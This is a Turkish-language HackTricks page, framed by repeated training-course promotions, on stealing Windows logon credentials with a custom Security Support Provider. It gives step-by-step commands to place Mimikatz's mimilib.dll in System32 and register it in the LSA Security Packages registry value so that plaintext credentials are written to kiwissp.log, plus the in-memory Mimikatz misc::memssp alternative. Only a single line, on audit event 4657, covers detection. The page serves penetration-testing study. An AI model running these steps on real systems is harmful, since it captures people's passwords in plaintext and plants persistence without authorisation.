Custom SSP
Tip
AWS Hacking öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
Değerlendirme yolları (ARTA/GRTA/AzRTA) ve Linux Hacking Expert (LHE) için tam HackTricks Training kataloğuna göz atın.
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna, telegram grubuna katılın, X/Twitter üzerinde @hacktricks_live hesabını takip edin veya LinkedIn sayfasını ve YouTube kanalını kontrol edin.
- HackTricks ve HackTricks Cloud github depolarına PR göndererek hacking tricks paylaşın.
Custom SSP
SSP (Güvenlik Destek Sağlayıcısı) nedir burada öğrenin.
Kendi SSP’nizi oluşturabilirsiniz, böylece makineye erişim için kullanılan kimlik bilgilerini düz metin olarak yakalayabilirsiniz.
Mimilib
Mimikatz tarafından sağlanan mimilib.dll ikili dosyasını kullanabilirsiniz. Bu, tüm kimlik bilgilerini düz metin olarak bir dosyaya kaydedecektir.
Dll’yi C:\Windows\System32\ dizinine bırakın.
Mevcut LSA Güvenlik Paketlerinin bir listesini alın:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
mimilib.dll’yi Güvenlik Destek Sağlayıcı listesine (Güvenlik Paketleri) ekleyin:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Ve bir yeniden başlatmadan sonra tüm kimlik bilgileri C:\Windows\System32\kiwissp.log dosyasında düz metin olarak bulunabilir.
Bellekte
Bunu doğrudan belleğe Mimikatz kullanarak da enjekte edebilirsiniz (biraz kararsız/çalışmayabileceğini unutmayın):
privilege::debug
misc::memssp
Bu yeniden başlatmalara dayanmaz.
Hafifletme
Olay ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages oluşturma/değiştirme denetimi
Tip
AWS Hacking öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
Değerlendirme yolları (ARTA/GRTA/AzRTA) ve Linux Hacking Expert (LHE) için tam HackTricks Training kataloğuna göz atın.
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna, telegram grubuna katılın, X/Twitter üzerinde @hacktricks_live hesabını takip edin veya LinkedIn sayfasını ve YouTube kanalını kontrol edin.
- HackTricks ve HackTricks Cloud github depolarına PR göndererek hacking tricks paylaşın.


